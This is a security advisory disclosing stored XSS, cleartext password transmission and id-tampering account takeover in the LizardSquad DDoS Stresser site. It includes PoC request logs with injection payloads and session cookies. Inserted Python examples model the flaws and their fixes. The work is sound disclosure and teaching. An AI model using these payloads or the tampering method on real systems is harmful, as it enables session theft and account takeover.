- Document Title:
- ===============
- LizardSquad DDoS Stresser - Multiple Vulnerabilities
- References (Source):
- ====================
- http://www.vulnerability-lab.com/get_content.php?id=1417
- http://magazine.vulnerability-db.com/?q=articles/2015/01/20/lizardsquad-ddos-stresser-multiple-vulnerabilities-revealed-takeover-ddos#
- Release Date:
- =============
- 2015-01-20
- Vulnerability Laboratory ID (VL-ID):
- ====================================
- 1417
- Common Vulnerability Scoring System:
- ====================================
- 8.9
- Product & Service Introduction:
- ===============================
- The product, called Lizard Stresser, is a stress tester that might let you see how your own network stands up to DDoS attacks,
- like the ones that interrupted the gaming networks for several days last week. DDoS attacks basically overload servers with
- massive amounts of bogus requests.
- (Copy of the Homepage: https://lizardstresser.su/ )
- Abstract Advisory Information:
- ==============================
- The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official LizardSquad DDoS Stresser online-service web-application.
- Vulnerability Disclosure Timeline:
- ==================================
- 2015-01-20: Public Disclosure (Vulnerability Laboratory)
- Discovery Status:
- =================
- Published
- Affected Product(s):
- ====================
- LizardSquad
- Product: DDoS Stresser - Web Application (Online-Service) 2015 Q1
- Exploitation Technique:
- =======================
- Remote
- Severity Level:
- ===============
- High
- Technical Details & Description:
- ================================
- Multiple web vulnerabilities have been discovered in the official LizardSquad `Stresser DDoS Service` web-application.
- 1.1
- The 1st vulnerability is a persistent (application-side) script code injection in the `username` value of the registration module
- (register.php). A user can register with script code as the username. The ddos web-service encodes and parses the registration
- input under the wrong conditions, so the injected code is stored and later executes in the `./ref` module of the service, and a
- second time in the main dashboard, where the username is rendered in the left sidebar. The request method to inject is POST and
- the vulnerability is located on the application side of the ddos stresser service. Because passwords are transferred in plain
- text through the ddos application (see 1.4), the main administrators are able to see the user passwords; the logs of a compromised
- server show that they switch accounts by logging in through the registered user accounts. This known behaviour can be used to
- prepare malicious code that executes functions in the administrator's browser in connection with the application-side injected
- script code, as soon as the stored username is displayed.
- Vulnerable Module(s):
- [+] Registration (./ref)
- Vulnerable Parameter(s):
- [+] username
- Affected Module(s):
- [+] Dashboard (Username in Left Sidebar)
- 1.2
- The 2nd vulnerability is a persistent script code injection in the Ticket Title and Ticket Content input fields of the `Tickets`
- (./tickets) module. A freshly registered user account is able to inject its own malicious persistent script code into the ticket
- input fields to exploit a backend administrator account. After registering and injecting script code into the ticket system, the
- attacker is able to obtain the IP addresses of the backend users or to compromise the session data of moderators/administrators.
- The injection is submitted through the `./ajax/addticket.php` request of the `./tickets` module and the execution takes place in
- the listed open ticket items of the backend. Remote attackers are also able to access other tickets and their stored information
- by intercepting and manipulating the add-ticket POST request.
- Vulnerable Module(s):
- [+] Tickets (./tickets)
- Vulnerable Parameter(s):
- [+] title2, code, content (ticket title & ticket content)
- 1.3
- The 3rd vulnerability is located in the target server `name` value. The attacker uses a device or server name to send malicious
- data to the ddos application control panel: a remote attacker changes the server or device name value to a script code payload
- that executes in the panel's server target list. The service syncs the device/server name value after the infection, and also
- whenever the attacker syncs the data manually. When macOS is used to attack, the server name can easily be changed to a malicious
- script code payload that affects the ddos control panel.
- Vulnerable Module(s):
- [+] server list
- Vulnerable Parameter(s):
- [+] name (servername)
- 1.4
- The 4th vulnerability is located in the `dashboard > user settings > change password` module. The POST request that changes the
- own account password is sent in plain text over HTTP (the PoC session log below shows the request going to
- http://lizardstresser.su/usercp rather than to an https endpoint). This allows remote attackers and network administrators on the
- path to capture account credentials, and the service can also be observed by man-in-the-middle attacks in the local network.
- Vulnerable Module(s):
- [+] dashboard > user settings > change password
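The following is an added example, not code from the advisory or from the stresser service, that shows what a passive observer on the path actually gets from the plain-HTTP change-password request described in 1.4. It parses a constructed raw request modelled on the PoC session log (placeholder values, not the ones in the log) and lists the password fields and session cookies that are readable when the scheme is http; the field-name patterns are assumptions for illustration. The same request over https yields nothing.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample request modelled on the advisory's /usercp change-password
# log. Cookie and password values are placeholders, not the advisory's data.
SAMPLE_REQUEST = (
    "POST /usercp HTTP/1.1\r\n"
    "Host: lizardstresser.su\r\n"
    "Cookie: __cfduid=d41d8cd98f00b204e9800998ecf8427e; PHPSESSID=abcdef0123456789\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "cpassword=oldsecret&npassword=newsecret&rpassword=newsecret"
    "&updatePassBtn=Change+Stored+Data%21"
)

# Assumed naming conventions for credential fields and session cookies.
# "updatePassBtn" must not match, hence the anchor on the field name's end.
PASSWORD_FIELD_RE = re.compile(r"(password|passwd|pwd)$", re.IGNORECASE)
SESSION_COOKIE_RE = re.compile(r"sess|sid|token|auth", re.IGNORECASE)


def parse_http_request(raw: str):
    """Split a raw HTTP/1.x request into (method, path, headers, body).
    Header names are lower-cased so lookups are case-insensitive."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def find_cleartext_secrets(scheme: str, raw: str) -> dict:
    """Return the credential fields and session cookies a network observer
    (LAN man-in-the-middle, upstream operator) can read from this request.
    Over TLS neither headers nor body are observable, so the result is empty."""
    result = {"password_fields": [], "session_cookies": []}
    if scheme.lower() == "https":
        return result
    _method, _path, headers, body = parse_http_request(raw)
    if "x-www-form-urlencoded" in headers.get("content-type", ""):
        for name, _value in parse_qsl(body, keep_blank_values=True):
            if PASSWORD_FIELD_RE.search(name):
                result["password_fields"].append(name)
    for part in headers.get("cookie", "").split(";"):
        name = part.strip().partition("=")[0]
        if name and SESSION_COOKIE_RE.search(name):
            result["session_cookies"].append(name)
    return result


if __name__ == "__main__":
    print("http :", find_cleartext_secrets("http", SAMPLE_REQUEST))
    print("https:", find_cleartext_secrets("https", SAMPLE_REQUEST))
```

The cookie check matters as much as the password fields: the PoC logs show the same PHPSESSID being sent on every request, so an observer of one plain-HTTP request also gets the session and does not need the password at all.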
- 1.5
- The 5th vulnerability is also located in the `dashboard > user settings > change password` module. The POST request of the change
- function in the ddos application can be intercepted by an attacker and its `id` parameter tampered with, so that the change is
- applied to another, existing user account instead of the attacker's own. The remote attacker logs in as a normal user, intercepts
- the request and switches the id to an existing user account. Successful exploitation of the session tampering issue results in
- compromise of the account system (administrators/customers).
- Vulnerable Module(s):
- [+] dashboard > user settings > change password
- Vulnerable Parameter(s):
- [+] id
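As an added example (not the service's code, which the advisory does not include), the following reconstructs the change-password handler from 1.5 in two versions: one that trusts the client-supplied `id` field, and one that takes the target account from the server-side session and additionally requires the current password. Field names match the PoC log (cpassword, npassword, rpassword, id); the user table, the account ids and the PBKDF2 storage format are assumptions for illustration.

```python
import hashlib
import hmac
import os

PBKDF2_ROUNDS = 50_000  # assumed work factor for the illustrative password store


def hash_password(password: str, salt: bytes = None) -> bytes:
    """salt || PBKDF2-HMAC-SHA256(password); the 16-byte salt is stored in front."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt + digest


def verify_password(password: str, stored: bytes) -> bool:
    salt, digest = stored[:16], stored[16:]
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, digest)


def make_users() -> dict:
    """Fresh in-memory user table with constructed sample accounts."""
    return {
        1: {"name": "admin", "pw": hash_password("admin-original")},
        2: {"name": "customer", "pw": hash_password("customer-original")},
    }


def change_password_vulnerable(users: dict, session: dict, post: dict) -> int:
    """Trusts the `id` value from the form body. The logged-in user is ignored,
    so editing `id` in the intercepted POST repoints the change at any account."""
    uid = int(post["id"])
    if post["npassword"] != post["rpassword"]:
        raise ValueError("new passwords do not match")
    users[uid]["pw"] = hash_password(post["npassword"])
    return uid


def change_password_fixed(users: dict, session: dict, post: dict) -> int:
    """Target account comes only from the server-side session, and the caller
    must prove the current password; a stray `id` in the body is ignored."""
    uid = session["user_id"]
    if not verify_password(post["cpassword"], users[uid]["pw"]):
        raise PermissionError("current password incorrect")
    if post["npassword"] != post["rpassword"]:
        raise ValueError("new passwords do not match")
    users[uid]["pw"] = hash_password(post["npassword"])
    return uid


if __name__ == "__main__":
    # Attacker is logged in as account 2 but submits id=1 (the admin account).
    attacker_session = {"user_id": 2}
    tampered = {"id": "1", "cpassword": "customer-original",
                "npassword": "owned", "rpassword": "owned"}
    users = make_users()
    print("vulnerable handler changed account", change_password_vulnerable(users, attacker_session, tampered))
    users = make_users()
    print("fixed handler changed account", change_password_fixed(users, attacker_session, tampered))
```

The fix is the combination of both checks: deriving the subject from the session closes the object reference tampering, and requiring the current password means a stolen session alone (see 1.4) is not enough to lock the victim out.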
- Proof of Concept (PoC):
- =======================
- 1.1
- --- PoC Session Logs [POST] (Injection) ---
- Status: 200[OK]
- POST http://lizardstresser.su/usercp Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[-1] Mime Type[text/html]
- Request Header:
- Host[lizardstresser.su]
- User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
- Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
- Accept-Language[de,en-US;q=0.7,en;q=0.3]
- Accept-Encoding[gzip, deflate]
- Referer[http://lizardstresser.su/usercp]
- Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01]
- Connection[keep-alive]
- POST data:
- cpassword[chaos666]
- npassword[http%3A%2F%2Flizardstresser.su%2F%3Fr%3Dimgsrcx2020iframesrca20iframe]
- rpassword[http%3A%2F%2Flizardstresser.su%2F%3Fr%3Dimgsrcx2020iframesrca20iframe]
- updatePassBtn[Change+Stored+Data%21]
- Response Header:
- Date[Tue, 20 Jan 2015 10:29:21 GMT]
- Content-Type[text/html]
- Transfer-Encoding[chunked]
- Connection[keep-alive]
- Expires[Thu, 19 Nov 1981 08:52:00 GMT]
- Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
- Pragma[no-cache]
- Server[cloudflare-nginx]
- CF-RAY[1aba972a06dd15b3-FRA]
- Content-Encoding[gzip]
- -
- Status: 302[Moved Temporarily]
- POST https://lizardstresser.su/register.php
- Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[-1] Mime Type[text/html]
- Request Header:
- Host[lizardstresser.su]
- User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
- Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
- Accept-Language[de,en-US;q=0.7,en;q=0.3]
- Accept-Encoding[gzip, deflate]
- Referer[https://lizardstresser.su/register.php]
- Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01]
- Connection[keep-alive]
- POST data:
- username[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E2]
- password[chaos666]
- rpassword[chaos666]
- email[research%40vulnerbaility-lab.com]
- ref[%2F]
- checkbox1[1]
- register[Register]
- Response Header:
- Server[cloudflare-nginx]
- Date[Tue, 20 Jan 2015 11:20:02 GMT]
- Content-Type[text/html]
- Expires[Thu, 19 Nov 1981 08:52:00 GMT]
- Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
- Pragma[no-cache]
- Location[/purchase]
- CF-RAY[1abae168238f15b3-FRA]
- X-Firefox-Spdy[3.1]
- Reference(s):
- http://lizardstresser.su/?r=imgsrcx2020iframesrca20iframe
- https://lizardstresser.su/register.php
- 1.2
- --- PoC Session Logs [POST] (Injection) ---
- Status: 200[OK]
- POST http://lizardstresser.su/ajax/addticket.php
- Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Content Size[-1] Mime Type[text/html]
- Request Header:
- Host[lizardstresser.su]
- User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
- Accept[*/*]
- Accept-Language[de,en-US;q=0.7,en;q=0.3]
- Accept-Encoding[gzip, deflate]
- Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
- X-Requested-With[XMLHttpRequest]
- Referer[http://lizardstresser.su/tickets]
- Content-Length[324]
- Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01]
- Connection[keep-alive]
- Pragma[no-cache]
- Cache-Control[no-cache]
- POST data:
- title2[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
- code[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
- content[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
- hash[JMX02SbuIwklRiGPAVDgeOC5nTs41xFp]
- Response Header:
- Date[Tue, 20 Jan 2015 10:30:54 GMT]
- Content-Type[text/html]
- Transfer-Encoding[chunked]
- Connection[keep-alive]
- Expires[Thu, 19 Nov 1981 08:52:00 GMT]
- Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
- Pragma[no-cache]
- Server[cloudflare-nginx]
- CF-RAY[1aba996d3d7115b3-FRA]
- Content-Encoding[gzip]
- Reference(s):
- http://lizardstresser.su/ajax/addticket.php
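The block below is an added example, not code from the advisory or from the stresser service, covering both the 1.1 (register.php `username`) and 1.2 (ajax/addticket.php ticket fields) PoCs. It takes the two form values exactly as the session logs show them, decodes them once the way PHP's $_POST does, and renders them into two hypothetical page fragments standing in for the dashboard sidebar and the backend ticket list (the real templates are not part of the advisory). The vulnerable renderer lets the `img` and `iframe` tags through; the fixed renderer HTML-encodes the value in the output context, which is what htmlspecialchars($v, ENT_QUOTES) does in PHP.

```python
import html
import re
from urllib.parse import unquote_plus

# The two form values from the advisory's PoC session logs, as the browser sent them.
POC_USERNAME = ("%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22"
                "%3Ciframe+src%3Da%3E%2520%3Ciframe%3E2")
POC_TICKET_TITLE = ("%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22"
                    "%3Ciframe+src%3Da%3E%2520%3Ciframe%3E")

# Hypothetical fragments for the dashboard left sidebar and the backend ticket
# list; the service's real templates are not known.
SIDEBAR_TEMPLATE = '<div class="sidebar">Logged in as <b>{value}</b></div>'
TICKET_ROW_TEMPLATE = '<tr><td class="title">{value}</td></tr>'

TAG_RE = re.compile(r"<([A-Za-z][A-Za-z0-9]*)")


def decode_form_value(raw: str) -> str:
    """One x-www-form-urlencoded decoding pass, i.e. what $_POST hands to PHP code.
    The %2520 sequences therefore come out as a literal %20, not as a space."""
    return unquote_plus(raw)


def render_unsafe(template: str, value: str) -> str:
    """Vulnerable pattern: the stored value is concatenated into HTML as-is."""
    return template.format(value=value)


def render_escaped(template: str, value: str) -> str:
    """Fixed pattern: encode <, >, &, " and ' for the HTML text context."""
    return template.format(value=html.escape(value, quote=True))


def tag_names(fragment: str) -> list:
    """Names of every opening tag a browser would parse out of the fragment."""
    return TAG_RE.findall(fragment)


def injected_tags(template: str, raw_value: str, renderer) -> list:
    """Tags present in the rendered page that the template itself did not
    contain, i.e. markup contributed by the attacker-controlled value."""
    baseline = tag_names(template.format(value=""))
    extra = tag_names(renderer(template, decode_form_value(raw_value)))
    for tag in baseline:
        extra.remove(tag)  # each template tag also appears in the rendered output
    return extra


if __name__ == "__main__":
    print("decoded username :", decode_form_value(POC_USERNAME))
    for name, template, raw in (("sidebar", SIDEBAR_TEMPLATE, POC_USERNAME),
                                ("ticket", TICKET_ROW_TEMPLATE, POC_TICKET_TITLE)):
        print(name, "unsafe :", injected_tags(template, raw, render_unsafe))
        print(name, "escaped:", injected_tags(template, raw, render_escaped))
```

The leading `">` in both payloads is what lets the same string work whether the value lands in an attribute or in text: it closes any open attribute and tag first, so the encoding has to happen in the output context on every page that shows the value (sidebar, ./ref and ticket list alike), not once at registration.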
- Credits & Authors:
- ==================
- Vulnerability Laboratory [Research Team]
- Disclaimer & Information:
- =========================
- The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
- or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
- in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
- or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
- consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
- policies, deface websites, hack into databases or trade with fraud/stolen material.
- Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
- Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
- Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
- Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
- Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
- Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
- Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
- electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
- Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
- is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
- (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
- Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
- --
- VULNERABILITY LABORATORY - RESEARCH TEAM
- SERVICE: www.vulnerability-lab.com
- CONTACT: research@vulnerability-lab.com
- PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt